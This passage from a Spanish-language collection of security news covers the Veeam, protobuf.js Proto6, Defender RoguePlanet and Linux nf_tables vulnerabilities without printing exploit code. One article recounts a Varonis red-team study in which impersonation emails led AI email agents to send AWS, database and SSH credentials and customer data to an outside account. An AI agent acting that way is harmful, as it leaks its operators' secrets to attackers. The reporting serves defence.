Algunos de esos fallos también podían derivar en escenarios de ejecución remota de código, elevación de privilegios y acceso no autorizado a componentes internos del sistema.

Este historial demuestra que las plataformas de respaldo, al igual que cualquier otro software empresarial complejo, requieren procesos continuos de actualización y mantenimiento.

Las organizaciones que retrasan la aplicación de parches suelen convertirse en objetivos atractivos para actores maliciosos que buscan explotar vulnerabilidades conocidas.

El riesgo de explotación por grupos ransomware

Uno de los aspectos más preocupantes de este tipo de vulnerabilidades es el interés que despiertan entre los grupos de ransomware.

Diversos incidentes registrados durante los últimos años han demostrado que organizaciones criminales especializadas en extorsión digital buscan activamente vulnerabilidades en soluciones de backup.

Cuando logran comprometer estos sistemas, los atacantes obtienen ventajas significativas:

• Impiden la recuperación de datos.
• Aumentan la presión sobre las víctimas.
• Incrementan las probabilidades de pago del rescate.
• Facilitan la exfiltración de información sensible.

Por ello, los expertos recomiendan no subestimar ninguna vulnerabilidad relacionada con plataformas de respaldo, incluso cuando la explotación requiere autenticación previa.

Recomendaciones para proteger entornos Veeam

Ante la divulgación de CVE-2026-44963, los especialistas recomiendan adoptar las siguientes medidas:

Actualizar inmediatamente

Instalar la versión 12.3.2.4854 o migrar a versiones superiores siempre que sea posible.

Aplicar el principio de mínimo privilegio

Limitar los permisos de usuarios y cuentas de servicio para reducir el impacto de posibles compromisos.

Revisar accesos al dominio

Monitorear cuentas autenticadas con acceso a la infraestructura de backup.

Segmentar la red

Separar los servidores de respaldo de otras áreas críticas para dificultar movimientos laterales.

Implementar monitoreo continuo

Detectar comportamientos anómalos relacionados con accesos, modificaciones de respaldos o ejecución de comandos sospechosos.

Mantener copias inmutables

Utilizar repositorios protegidos contra modificaciones para garantizar la recuperación ante incidentes.

En fin...

La vulnerabilidad CVE-2026-44963 representa una amenaza significativa para las organizaciones que utilizan versiones afectadas de Veeam Backup & Replication. Con una puntuación CVSS de 9.4, el fallo permite la ejecución remota de código por parte de usuarios autenticados y podría convertirse en un objetivo atractivo para grupos de ransomware y actores avanzados de amenazas.

Dado que los sistemas de respaldo constituyen uno de los activos más importantes dentro de cualquier estrategia de continuidad del negocio, la aplicación inmediata de los parches publicados por Veeam debe considerarse una prioridad absoluta. Mantener actualizada la infraestructura de backup no solo reduce la exposición a vulnerabilidades críticas, sino que también fortalece la capacidad de recuperación frente a ciberataques cada vez más sofisticados.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Investigadores de ciberseguridad han revelado un conjunto de seis vulnerabilidades de seguridad de alto impacto en protobuf.js, una de las implementaciones más utilizadas de Protocol Buffers (Protobuf) para JavaScript y TypeScript. Los fallos, agrupados bajo el nombre Proto6, podrían permitir desde ataques de denegación de servicio (DoS) hasta escenarios de ejecución remota de código (RCE) capaces de comprometer aplicaciones Node.js, plataformas en la nube, sistemas de inteligencia artificial y entornos CI/CD.

El hallazgo ha generado preocupación en la comunidad tecnológica debido a la amplia adopción de protobuf.js en servicios empresariales modernos. Según los investigadores de la firma de seguridad Cyera, una única carga útil maliciosa, descriptor manipulado o esquema Protobuf especialmente diseñado podría desencadenar fallos críticos, corrupción en tiempo de ejecución e incluso la ejecución arbitraria de código dentro de procesos vulnerables.

¿Qué es Protobuf y por qué es tan importante?

Protocol Buffers (Protobuf) es un mecanismo de serialización de datos desarrollado originalmente por Google para facilitar el intercambio eficiente de información estructurada entre aplicaciones y servicios.

Desde su liberación como proyecto de código abierto en 2008, Protobuf se ha convertido en un estándar ampliamente utilizado en:

• Aplicaciones Node.js
• Servicios en la nube
• APIs empresariales
• Sistemas de mensajería
• Plataformas de inteligencia artificial
• Microservicios
• Herramientas DevOps
• Entornos CI/CD

La biblioteca protobuf.js permite a los desarrolladores trabajar con esquemas Protobuf dentro del ecosistema JavaScript y TypeScript, siendo utilizada por numerosos SDKs, frameworks y servicios empresariales.

Precisamente debido a esta enorme adopción, cualquier vulnerabilidad en la biblioteca puede tener un impacto significativo en miles de aplicaciones y organizaciones.

Proto6: Las seis vulnerabilidades descubiertas en protobuf.js

Los investigadores identificaron seis fallos distintos que afectan la forma en que protobuf.js procesa esquemas, metadatos y datos de entrada.

CVE-2026-44289 – Denegación de servicio mediante recursión ilimitada

CVSS: 7.5

Esta vulnerabilidad permite provocar un ataque DoS explotando estructuras Protobuf recursivas sin límites adecuados de validación.

Un atacante podría enviar datos especialmente diseñados para consumir recursos excesivos del sistema hasta provocar bloqueos o caídas de la aplicación.

CVE-2026-44290 – DoS mediante rutas de opciones inseguras

CVSS: 7.5

El fallo afecta el procesamiento de esquemas cuando contienen rutas de opciones manipuladas.

La carga de estos esquemas puede provocar interrupciones del proceso y afectar la disponibilidad de servicios críticos.

CVE-2026-44291 – Ejecución remota de código mediante contaminación de prototipos

CVSS: 8.1

Se trata de una de las vulnerabilidades más peligrosas identificadas dentro de Proto6.

La explotación combina técnicas de contaminación de prototipos con el mecanismo de generación dinámica de código utilizado por protobuf.js.

Según explicó el investigador Vladimir Tokarev, un atacante puede introducir datos manipulados que terminan modificando propiedades heredadas de objetos JavaScript.

Posteriormente, cuando protobuf.js genera funciones de codificación o decodificación, la biblioteca interpreta datos controlados por el atacante como tipos válidos y los compila utilizando la función Function().

Como resultado, el atacante puede conseguir la ejecución arbitraria de código JavaScript dentro del proceso Node.js comprometido.

CVE-2026-44292 – Inyección de prototipos en mensajes generados

CVSS: 5.3

Este fallo permite alterar el comportamiento interno de constructores de mensajes generados automáticamente.

Aunque su impacto es menor que el de otros defectos, puede utilizarse como parte de cadenas de ataque más complejas orientadas a comprometer aplicaciones vulnerables.

CVE-2026-44294 – DoS mediante nombres de campos manipulados

CVSS: 5.3

La vulnerabilidad aprovecha nombres de campos especialmente elaborados para generar errores durante la construcción de código.

Los atacantes podrían utilizar esta técnica para provocar interrupciones de servicio y degradar el rendimiento de sistemas afectados.

CVE-2026-44295 – Inyección de código en la salida estática de pbjs

CVSS: 8.7

Este es el fallo con la puntuación más alta de todo el conjunto Proto6.

La vulnerabilidad afecta a la herramienta pbjs y permite inyectar código malicioso mediante nombres de esquemas especialmente diseñados.

En determinados escenarios, un atacante podría comprometer pipelines de compilación automatizados y obtener acceso a información sensible durante procesos CI/CD.

Cómo podrían explotar los atacantes estas vulnerabilidades

De acuerdo con Cyera, la raíz del problema se encuentra en la manera en que protobuf.js maneja por defecto esquemas y metadatos sin aplicar suficientes validaciones de seguridad.

En los ecosistemas modernos, los esquemas Protobuf suelen intercambiarse constantemente entre:

• Repositorios de código
• Servicios cloud
• Sistemas de IA
• Integraciones de terceros
• Herramientas de automatización
• Plataformas DevOps

Esta confianza implícita crea una superficie de ataque cada vez mayor.

Los investigadores advierten que los atacantes podrían aprovechar esta situación para introducir esquemas maliciosos capaces de modificar el comportamiento de aplicaciones enteras.

Riesgos para entornos Node.js, IA y CI/CD

Uno de los escenarios más preocupantes involucra ataques contra pipelines de integración y despliegue continuo.

Mediante la explotación de CVE-2026-44295, un actor malicioso podría introducir esquemas manipulados dentro del flujo de desarrollo y provocar la filtración de:

• Secretos de compilación
• Tokens de acceso
• Credenciales cloud
• Variables de entorno
• Claves API

Además, aplicaciones Node.js que procesan datos externos podrían ser vulnerables a ataques de denegación de servicio o ejecución remota de código.

Los investigadores también destacan riesgos específicos para sistemas de inteligencia artificial, bases de datos vectoriales y plataformas de inferencia que utilizan Protobuf como formato de intercambio de datos.

Impacto potencial en Baileys y bots de WhatsApp

Otro caso destacado afecta a proyectos construidos con Baileys, una popular biblioteca TypeScript utilizada para automatizar la API web de WhatsApp.

Según el informe, un mensaje especialmente diseñado podría aprovechar ciertas vulnerabilidades para provocar bloqueos del servicio o afectar la disponibilidad de bots automatizados que dependan de protobuf.js.

Dado que Baileys es ampliamente utilizado por empresas para automatizar atención al cliente y mensajería empresarial, el riesgo no debe subestimarse.

Versiones vulnerables de protobuf.js

Cyera confirmó que las siguientes versiones se encuentran afectadas:

• protobuf.js
• Versiones ≤ 7.5.5
• Versiones 8.0.0 y 8.0.1

[li]protobufjs-cli[/li]
[li]Versiones ≤ 1.2.0[/li]
[li]Versiones 2.0.0 y 2.0.1[/li]
[/list]

Cualquier organización que utilice estas versiones debería evaluar inmediatamente su exposición al riesgo.

Actualizaciones y parches disponibles

Los desarrolladores ya han publicado correcciones de seguridad para todas las vulnerabilidades identificadas.

Las versiones recomendadas son:

• protobuf.js
• 7.5.6
• 8.0.2
• protobufjs-cli
• 1.2.1
• 2.0.2

Actualizar a estas versiones es actualmente la medida de mitigación más importante para reducir el riesgo de explotación.

Lecciones para la seguridad moderna

El caso Proto6 refleja una tendencia cada vez más preocupante en la industria tecnológica: la creciente dependencia de esquemas, configuraciones y metadatos considerados tradicionalmente como información confiable.

A medida que las organizaciones adoptan arquitecturas basadas en automatización, inteligencia artificial y microservicios, estos elementos se convierten en componentes críticos que pueden influir directamente en el comportamiento del software.

Cuando un atacante consigue manipular dichos datos, la frontera entre información y ejecución comienza a desaparecer.

En fin...

Las vulnerabilidades Proto6 representan una seria amenaza para el ecosistema Node.js y para las organizaciones que utilizan protobuf.js en aplicaciones empresariales, plataformas cloud, sistemas de inteligencia artificial y pipelines CI/CD. La posibilidad de lograr ejecución remota de código, contaminación de prototipos e interrupciones de servicio demuestra que incluso bibliotecas ampliamente confiables pueden convertirse en vectores de ataque de alto impacto.

Dado que protobuf.js se encuentra integrado en innumerables aplicaciones modernas, los equipos de seguridad y desarrollo deben priorizar la actualización inmediata a las versiones corregidas, revisar los mecanismos de validación de esquemas y adoptar controles más estrictos sobre los datos que impulsan procesos automatizados. En un entorno donde los metadatos pueden convertirse en código ejecutable, la confianza implícita ya no es una estrategia de seguridad viable.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

La adopción de agentes de inteligencia artificial capaces de actuar de forma autónoma está creciendo rápidamente en empresas de todo el mundo. Sin embargo, una nueva investigación demuestra que estas herramientas no son inmunes a las técnicas de ingeniería social que durante décadas han sido utilizadas para engañar a usuarios humanos.

Un estudio realizado por la empresa de ciberseguridad Varonis reveló que un agente de correo electrónico basado en OpenClaw fue vulnerable a múltiples campañas simuladas de phishing, llegando incluso a exfiltrar credenciales críticas, información financiera y datos corporativos sensibles sin verificar adecuadamente la identidad de los remitentes.

Los resultados ponen de manifiesto un nuevo desafío para la seguridad empresarial: proteger no solo a las personas, sino también a los agentes de IA que actúan en su nombre.

¿Qué es OpenClaw y por qué preocupa a los expertos?

OpenClaw es un framework de código abierto diseñado para permitir que los grandes modelos de lenguaje (LLM) interactúen con sistemas reales y ejecuten tareas de manera autónoma.

A diferencia de un chatbot tradicional, un agente basado en OpenClaw puede:

• Leer correos electrónicos.
• Acceder a bases de datos.
• Interactuar con aplicaciones empresariales.
• Gestionar calendarios.
• Consultar documentos internos.
• Ejecutar acciones automatizadas.

Esta capacidad convierte a los agentes de IA en herramientas extremadamente productivas, pero también amplía significativamente la superficie de ataque para los ciberdelincuentes.

Con el objetivo de evaluar estos riesgos, los investigadores de Varonis desarrollaron un agente denominado Pinchy y lo conectaron a una infraestructura empresarial simulada.

Cómo se diseñó el experimento

Para reproducir un entorno corporativo realista, los investigadores proporcionaron al agente acceso a múltiples recursos empresariales.

Entre los datos disponibles se encontraban:

• Credenciales AWS.
• Credenciales de bases de datos.
• Exportaciones de CRM.
• Comunicaciones internas.
• Invitaciones de calendario.
• Documentación corporativa sensible.

Todo el entorno fue diseñado para representar información que normalmente sería considerada de alto valor para atacantes.

Además, el agente fue configurado bajo dos perfiles distintos:

Configuración genérica

Incluía instrucciones básicas de productividad y automatización sin controles avanzados de seguridad.

Configuración estricta

Incorporaba políticas adicionales orientadas a la detección de phishing, validación de solicitudes y mejores prácticas de seguridad.

Los investigadores ejecutaron el experimento utilizando dos modelos avanzados de inteligencia artificial:

• OpenAI GPT-5.4
• Google Gemini 3.1 Pro

El objetivo era determinar si los agentes podían resistir tácticas de phishing similares a las utilizadas contra empleados humanos.

Primer ataque: Robo de credenciales AWS y acceso a servidores

El primer escenario simuló un correo urgente enviado por un supuesto líder de equipo que afirmaba estar gestionando un incidente crítico de producción.

La solicitud pedía acceso inmediato a sistemas internos para resolver el problema.

El resultado fue alarmante.

El agente localizó automáticamente:

• Claves AWS IAM.
• Credenciales de bases de datos.
• Accesos SSH.

Posteriormente envió toda esta información a una cuenta externa de Gmail controlada por los investigadores.

Lo más preocupante es que tanto la configuración genérica como la estricta fallaron en detectar la suplantación de identidad.

Segundo ataque: Exfiltración masiva de datos de clientes

En el segundo escenario, el atacante se hizo pasar por un empleado que trabajaba remotamente y necesitaba información para una presentación.

El agente recibió una solicitud aparentemente legítima para exportar datos de clientes.

Sin verificar la autenticidad del remitente, recuperó y envió una exportación completa del CRM que contenía:

• Información de contacto.
• Datos comerciales.
• Contratos.
• Historiales de clientes.
• Información de ingresos.

Desde la perspectiva de seguridad corporativa, este escenario representa un riesgo extremadamente elevado, ya que podría derivar en incumplimientos regulatorios y filtraciones masivas de datos.

Tercer ataque: Enlace de phishing con tarjeta regalo falsa

El tercer ejercicio evaluó la capacidad del agente para detectar sitios web fraudulentos.

Los investigadores enviaron un correo con una supuesta tarjeta regalo que incluía un enlace malicioso.

En la configuración genérica, el agente:

• Visitó el sitio.
• Analizó la página.
• Intentó canjear la tarjeta utilizando credenciales falsas.
• Finalmente identificó el sitio como sospechoso.

Aunque terminó detectando la amenaza, ya había interactuado con la infraestructura del atacante.

Por el contrario, el perfil estricto bloqueó la acción inmediatamente, demostrando que ciertas medidas de seguridad pueden mejorar significativamente la resistencia frente al phishing tradicional.

Cuarto ataque: Aplicación OAuth maliciosa

El último escenario evaluó la capacidad de detectar aplicaciones falsas diseñadas para robar permisos de acceso.

Los investigadores crearon una aplicación de Google OAuth disfrazada como una plataforma corporativa para registrar horas de trabajo.

En este caso, los resultados fueron mucho más positivos.

El agente:

• Inspeccionó el flujo OAuth.
• Analizó el dominio de destino.
• Evaluó los permisos solicitados.
• Detectó comportamientos sospechosos.
• Rechazó la autorización.

Esto demuestra que los agentes modernos pueden identificar señales técnicas de fraude cuando estas están claramente presentes.

¿Por qué fallaron los agentes de IA?

Según Varonis, el problema principal no fue la detección de indicadores técnicos de phishing, sino la incapacidad para validar adecuadamente identidades humanas.

Los investigadores descubrieron que los agentes son relativamente eficaces para:

• Detectar URLs sospechosas.
• Identificar páginas falsas de inicio de sesión.
• Analizar aplicaciones OAuth maliciosas.
• Reconocer patrones típicos de phishing.

Sin embargo, presentan debilidades importantes cuando deben interpretar contextos sociales complejos.

Entre las principales limitaciones identificadas destacan:

Falta de verificación de identidad

Los agentes asumieron que ciertos correos eran legítimos sin validar quién los enviaba realmente.

Exceso de confianza en solicitudes urgentes

Las peticiones que simulaban incidentes operativos generaron respuestas automáticas sin suficientes comprobaciones.

Pérdida de contexto empresarial

Los agentes carecen de mecanismos sólidos para entender relaciones jerárquicas y procesos internos.

Ausencia de principios Zero Trust

Las decisiones se tomaron bajo supuestos de confianza implícita en lugar de aplicar verificaciones continuas.

Gemini vs GPT-5.4: Diferencias observadas

El análisis también reveló diferencias entre ambos modelos.

Los investigadores observaron que Gemini mostró una mayor predisposición a interactuar con solicitudes externas y completar tareas solicitadas.

Por su parte, GPT-5.4 adoptó una postura más conservadora y mostró mayor resistencia frente a determinadas acciones potencialmente riesgosas.

Aunque ninguno de los modelos fue completamente inmune, los resultados sugieren que la configuración de seguridad y las restricciones operativas son tan importantes como las capacidades del modelo utilizado.

Cómo proteger agentes de IA frente al phishing

A partir de los hallazgos, Varonis recomienda implementar varias medidas de protección antes de desplegar agentes autónomos en entornos corporativos.

Entre las más importantes destacan:

• Obligar a la verificación de identidad de remitentes.
• Restringir el envío de información a destinatarios externos desconocidos.
• Limitar el acceso a datos sensibles.
• Implementar políticas de mínimo privilegio.
• Aplicar controles de aprobación humana para acciones críticas.
• Auditar continuamente las decisiones tomadas por los agentes.

Además, cualquier acción relacionada con:

• Credenciales.
• Información financiera.
• Exportaciones de datos.
• Nuevos contactos externos.

Debería requerir validación humana obligatoria antes de ejecutarse.

En fin...

La investigación demuestra que los agentes de inteligencia artificial pueden convertirse en objetivos tan vulnerables como los empleados humanos cuando son expuestos a técnicas avanzadas de ingeniería social. Aunque herramientas como OpenClaw, GPT-5.4 y Gemini muestran capacidades prometedoras para detectar amenazas técnicas, todavía presentan limitaciones significativas en la validación de identidades y la aplicación de principios de confianza cero.

A medida que las organizaciones adopten agentes autónomos para gestionar correos electrónicos, datos empresariales y operaciones críticas, será imprescindible implementar controles de seguridad específicos. De lo contrario, los ciberdelincuentes podrían encontrar en estos asistentes inteligentes un nuevo vector para robar credenciales, exfiltrar información sensible y comprometer infraestructuras corporativas completas.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

La comunidad de ciberseguridad vuelve a poner sus ojos sobre Microsoft tras la divulgación de un nuevo exploit zero-day denominado RoguePlanet, una vulnerabilidad que afecta a Microsoft Defender y que, según su descubridor, puede ser explotada en sistemas Windows 10 y Windows 11 completamente actualizados.

La revelación se produjo apenas unas horas después de que Microsoft publicara las actualizaciones de seguridad correspondientes al Patch Tuesday de junio de 2026, en las que corrigió dos vulnerabilidades previamente divulgadas por el mismo investigador. El hallazgo ha generado preocupación entre expertos y administradores de sistemas debido a que el exploit permite obtener privilegios de nivel SYSTEM, el nivel más alto de acceso dentro del sistema operativo Windows.

¿Qué es RoguePlanet y por qué representa una amenaza?

El investigador de seguridad conocido bajo el alias Nightmare Eclipse publicó un exploit de prueba de concepto (PoC) que demuestra cómo aprovechar una vulnerabilidad de condición de carrera (race condition) en Microsoft Defender para elevar privilegios de forma local.

Según la información compartida por el investigador, el fallo afecta tanto a Windows 10 como a Windows 11, incluyendo equipos que cuentan con todas las actualizaciones de seguridad instaladas hasta junio de 2026.

La vulnerabilidad permite que un atacante ejecute procesos con permisos SYSTEM, lo que le otorga control total sobre el dispositivo comprometido. Con este nivel de acceso, un ciberdelincuente podría instalar malware, modificar configuraciones críticas, acceder a información confidencial o desactivar mecanismos de seguridad.

Nightmare Eclipse explicó que el exploit no garantiza el éxito en todos los intentos debido a la naturaleza de las condiciones de carrera.

Citar"El exploit es una condición de raza, así que es un acierto o un error. He conseguido un 100% de éxito en algunas máquinas mientras que en otras le costaba funcionar", afirmó el investigador.

A pesar de esta limitación, el hecho de que el ataque funcione en determinados entornos convierte la vulnerabilidad en una amenaza significativa para organizaciones y usuarios que dependen de Microsoft Defender como principal solución de protección.

ThreatLocker confirma la explotación exitosa

La preocupación aumentó cuando la empresa de ciberseguridad ThreatLocker confirmó que logró reproducir exitosamente el ataque en un entorno de pruebas.

Durante sus evaluaciones, los investigadores verificaron que RoguePlanet funcionaba en sistemas Windows 11 completamente actualizados que tenían instalada la actualización de seguridad KB5094126.

Danny Jenkins, CEO de ThreatLocker, señaló que el exploit es técnicamente viable y puede ejecutarse tal como fue descrito por su creador.

Según la compañía, las organizaciones que implementan soluciones de control de aplicaciones y listas blancas pueden reducir considerablemente el riesgo de explotación al impedir la ejecución de componentes no autorizados.

Esta validación independiente otorga mayor credibilidad al hallazgo y aumenta la presión sobre Microsoft para emitir una respuesta oficial o desarrollar medidas de mitigación adicionales.

De una posible ejecución remota de código a una escalada de privilegios local

Uno de los aspectos más interesantes de RoguePlanet es que inicialmente fue desarrollado como una vulnerabilidad potencial de ejecución remota de código (RCE).

De acuerdo con Nightmare Eclipse, la investigación comenzó analizando cómo Microsoft Defender gestionaba archivos almacenados en recursos compartidos SMB remotos.

Durante las primeras etapas del análisis, el investigador descubrió que era posible forzar a una víctima a abrir archivos VHD o VHDX alojados en servidores SMB controlados por un atacante.

En escenarios exitosos, Microsoft Defender terminaba sobrescribiendo algunos de sus propios archivos internos, lo que podía derivar en la ejecución de código arbitrario.

El investigador explicó que la vulnerabilidad tenía el potencial de convertirse en una amenaza mucho más grave si determinadas configuraciones relacionadas con la evaluación de enlaces simbólicos estuvieran habilitadas.

Sin embargo, Microsoft habría realizado cambios silenciosos en Defender durante mayo de 2026 que bloquearon ciertos métodos de explotación.

Microsoft reforzó Defender antes de la divulgación

Según los detalles técnicos compartidos por Nightmare Eclipse, Microsoft habría endurecido internamente varios componentes de Defender semanas antes de la publicación del exploit.

El investigador asegura que modificaciones introducidas en funciones identificadas como mpengine!SysIO* bloquearon ataques basados en uniones y enlaces simbólicos que formaban parte de las cadenas de explotación originales.

Estos cambios habrían limitado significativamente las posibilidades de convertir RoguePlanet en una vulnerabilidad de ejecución remota de código plenamente funcional.

No obstante, el exploit sigue siendo capaz de lograr una escalada local de privilegios (LPE), permitiendo a atacantes obtener acceso SYSTEM en equipos vulnerables.

Por el momento, no existe evidencia pública que confirme la posibilidad de transformar RoguePlanet nuevamente en un vector de RCE, aunque el investigador reconoce que continúa evaluando distintos escenarios.

Una disputa creciente entre Microsoft y Nightmare Eclipse

La publicación de RoguePlanet forma parte de una controversia más amplia entre Microsoft y Nightmare Eclipse relacionada con la divulgación responsable de vulnerabilidades y los programas de recompensas por errores.

Durante los últimos meses, el investigador ha publicado diversos zero-days dirigidos a componentes críticos del ecosistema Windows, incluyendo vulnerabilidades conocidas como:

• BlueHammer
• RedSun
• GreenPlasma
• YellowKey

Algunas de estas fallas afectaban directamente a Microsoft Defender, mientras que otras impactaban componentes sensibles como BitLocker y mecanismos internos de Windows.

Precisamente, Microsoft corrigió las vulnerabilidades GreenPlasma y YellowKey durante el Patch Tuesday de junio de 2026, apenas horas antes de la aparición de RoguePlanet.

La tensión entre ambas partes aumentó cuando Microsoft indicó anteriormente que colaboraría con las autoridades en casos donde determinadas actividades pudieran causar daños reales a sus clientes. Estas declaraciones fueron interpretadas por parte de la comunidad de seguridad como una advertencia indirecta hacia el investigador.

Repositorios eliminados y publicación en infraestructura propia

Otro punto polémico del caso es la distribución pública del exploit.

Nightmare Eclipse sostiene que Microsoft habría solicitado la eliminación de varios repositorios alojados en GitHub y GitLab donde anteriormente compartía sus investigaciones y pruebas de concepto.

Como respuesta, el investigador decidió migrar la publicación de sus hallazgos a una plataforma autoalojada bajo su propio control, desde donde difundió el código de RoguePlanet.

Este movimiento dificulta la eliminación del contenido y garantiza que investigadores de seguridad, empresas y analistas puedan estudiar el exploit independientemente de las políticas de terceros.

Qué deben hacer las organizaciones ante RoguePlanet

Mientras Microsoft analiza el nuevo reporte, las organizaciones deberían adoptar medidas preventivas para reducir la superficie de ataque:

• Implementar listas blancas de aplicaciones.
• Restringir privilegios administrativos innecesarios.
• Monitorizar actividades sospechosas relacionadas con Microsoft Defender.
• Revisar configuraciones SMB y accesos compartidos.
• Mantener actualizados los sistemas Windows.
• Aplicar soluciones avanzadas de detección y respuesta (EDR).
• Supervisar eventos de escalada de privilegios en endpoints críticos.

Aunque RoguePlanet requiere condiciones específicas para su explotación, la confirmación independiente de su funcionamiento demuestra que se trata de una amenaza real para entornos Windows modernos.

En fin...

La divulgación de RoguePlanet representa un nuevo desafío para Microsoft y pone de manifiesto que incluso las plataformas de seguridad integradas pueden convertirse en objetivos de ataque. La vulnerabilidad permite obtener privilegios SYSTEM en sistemas Windows 10 y Windows 11 completamente actualizados, lo que la convierte en una amenaza especialmente preocupante para empresas y organismos que dependen de Microsoft Defender como primera línea de defensa.

Hasta el momento, Microsoft no ha emitido un comunicado oficial sobre este nuevo zero-day. Sin embargo, la validación realizada por ThreatLocker confirma que el exploit funciona en entornos reales, por lo que las organizaciones deberían adoptar medidas de mitigación inmediatas mientras se espera una solución definitiva.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

La seguridad del kernel de Linux vuelve a estar bajo el foco de la comunidad de ciberseguridad tras la publicación de un exploit funcional para CVE-2026-23111, una vulnerabilidad de escalada local de privilegios (LPE) que permite a usuarios sin privilegios obtener acceso root y escapar de entornos aislados mediante contenedores.

El fallo afecta al subsistema nf_tables del kernel Linux, responsable del filtrado y procesamiento avanzado de paquetes de red. Aunque el problema fue corregido oficialmente en febrero de 2026, la reciente publicación de análisis técnicos detallados y código de explotación funcional ha incrementado significativamente el riesgo para sistemas que aún no han aplicado las actualizaciones de seguridad correspondientes.

La vulnerabilidad es especialmente preocupante porque puede utilizarse como etapa posterior a una intrusión inicial, permitiendo que un atacante transforme un acceso limitado en control total del sistema comprometido.

¿Qué es CVE-2026-23111?

CVE-2026-23111 es una vulnerabilidad de tipo use-after-free localizada dentro del código nf_tables del núcleo Linux.

Los errores use-after-free ocurren cuando el sistema continúa utilizando una región de memoria después de haber sido liberada. Este tipo de vulnerabilidades puede provocar corrupción de memoria y, en escenarios avanzados, permitir la ejecución arbitraria de código con privilegios elevados.

Según los investigadores, el origen del problema fue sorprendentemente simple: una única comprobación lógica invertida dentro del código de nf_tables.

La corrección implementada por los desarrolladores del kernel consistió en una modificación mínima de una sola línea de código. Sin embargo, pese a la simplicidad del parche, el impacto potencial del fallo es considerable.

Ubuntu ha clasificado la vulnerabilidad con una puntuación CVSS de 7.8, considerada de alta gravedad.

Cómo funciona la explotación

La explotación de CVE-2026-23111 requiere inicialmente acceso local al sistema objetivo. No existe un vector de ataque remoto directo asociado a esta vulnerabilidad.

Sin embargo, una vez que un atacante consigue acceso limitado mediante:

• Una cuenta de usuario comprometida.
• Un servicio vulnerable.
• Un contenedor comprometido.
• Una shell con privilegios restringidos.

Puede aprovechar el fallo para escalar privilegios y obtener control total sobre el host.

El investigador Oliver Sieber, de Exodus Intelligence, descubrió la vulnerabilidad a principios de 2025 y desarrolló una cadena de explotación completa que logra:

• Activar el use-after-free.
• Evadir las protecciones modernas del kernel.
• Manipular estructuras críticas de memoria.
• Obtener privilegios root.
• Escapar del aislamiento proporcionado por contenedores Linux.

La demostración fue validada exitosamente en:

• Debian Bookworm.
• Debian Trixie.
• Ubuntu 22.04 LTS.
• Ubuntu 24.04 LTS.

Este alcance evidencia que el problema afecta a algunas de las distribuciones Linux más utilizadas en entornos empresariales y servidores de producción.

nf_tables y espacios de nombres de usuario: la combinación vulnerable

La vulnerabilidad depende principalmente de dos características ampliamente utilizadas en sistemas Linux modernos:

nf_tables

nf_tables es el framework actual de filtrado de paquetes que reemplaza gradualmente a iptables. Se utiliza para implementar reglas de firewall, control de tráfico y políticas de seguridad de red.

User Namespaces

Los espacios de nombres de usuario o User Namespaces permiten que un usuario sin privilegios obtenga capacidades equivalentes a root dentro de un entorno aislado.

Esta característica fue diseñada para mejorar el aislamiento de procesos y facilitar tecnologías como:

• Contenedores Docker.
• Podman.
• LXC.
• Sandboxes de aplicaciones.
• Entornos de virtualización ligera.

El problema radica en que los User Namespaces exponen determinadas funcionalidades del kernel a usuarios sin privilegios, ampliando indirectamente la superficie de ataque disponible.

Dado que ambas funciones están habilitadas por defecto en numerosas distribuciones Linux, una gran cantidad de sistemas podrían haber sido vulnerables antes de aplicar las actualizaciones correspondientes.

Exodus Intelligence y FuzzingLabs publican exploits independientes

Uno de los aspectos más relevantes de este caso es que existen múltiples demostraciones públicas de explotación.

Exodus Intelligence publicó el 8 de junio de 2026 un análisis técnico completo detallando cada etapa de la cadena de ataque.

Sin embargo, esta no fue la primera reproducción pública.

Los investigadores de FuzzingLabs ya habían desarrollado y documentado un exploit independiente en abril de 2026, tras identificar el fallo durante sus investigaciones previas al evento de seguridad Pwn2Own Berlin 2026.

Lo más llamativo es que ambos equipos llegaron a resultados similares utilizando enfoques técnicos diferentes.

Esto demuestra que la vulnerabilidad es explotable de múltiples formas, lo que incrementa el riesgo para organizaciones que aún no han aplicado los parches disponibles.

Escalada de privilegios y escape de contenedores

En los últimos años, muchas organizaciones han adoptado arquitecturas basadas en contenedores bajo la premisa de que estos ofrecen una capa adicional de aislamiento frente a ataques.

No obstante, CVE-2026-23111 demuestra que una vulnerabilidad en el kernel puede romper esa barrera de seguridad.

Una vez explotado el fallo, un atacante puede:

• Escalar privilegios hasta root.
• Tomar control del host físico.
• Escapar del entorno aislado.
• Acceder a otros contenedores.
• Comprometer servicios adicionales alojados en el mismo servidor.

Este escenario resulta especialmente crítico en infraestructuras cloud, plataformas Kubernetes y entornos multiusuario.

Distribuciones afectadas y disponibilidad de parches

La buena noticia es que las correcciones están disponibles desde febrero de 2026.

Las principales distribuciones afectadas han publicado actualizaciones de seguridad para sus usuarios.

Entre ellas destacan:

Ubuntu

Canonical publicó correcciones para:

• Ubuntu 22.04 LTS.
• Ubuntu 24.04 LTS.
• Ubuntu 25.10.

Debian

Debian corrigió el problema en:

• Bookworm.
• Trixie.
• Backport 6.1 para Bullseye LTS.

Otras distribuciones

También han emitido avisos de seguridad:

• Red Hat Enterprise Linux.
• SUSE Linux Enterprise.
• Amazon Linux.

Los administradores deben verificar específicamente el paquete del kernel instalado, ya que la versión corregida puede variar según la distribución y la rama de mantenimiento utilizada.

El aumento de vulnerabilidades de escalada local en Linux

CVE-2026-23111 no es un caso aislado.

Durante las últimas semanas han aparecido múltiples vulnerabilidades de escalada local de privilegios que afectan al ecosistema Linux.

Entre las más destacadas se encuentran:

• Copy Fail.
• Dirty Frag.
• Fragnesia.
• DirtyDecrypt.
• Vulnerabilidades históricas en ptrace reexplotadas recientemente.

Aunque cada una utiliza mecanismos distintos, todas comparten una característica preocupante: un atacante con acceso limitado puede convertir rápidamente esa posición inicial en control total del sistema.

Expertos de seguridad han señalado que el auge de la investigación asistida por inteligencia artificial y las técnicas de patch-diffing están acelerando significativamente el desarrollo de exploits funcionales tras la publicación de parches.

En muchos casos, el tiempo disponible para aplicar actualizaciones antes de que aparezcan pruebas de concepto públicas es cada vez menor.

Recomendaciones de mitigación

Las organizaciones deben actuar con rapidez para reducir el riesgo asociado a esta vulnerabilidad.

Las medidas recomendadas incluyen:

• Actualizar inmediatamente el kernel Linux.
• Reiniciar los sistemas tras aplicar los parches.
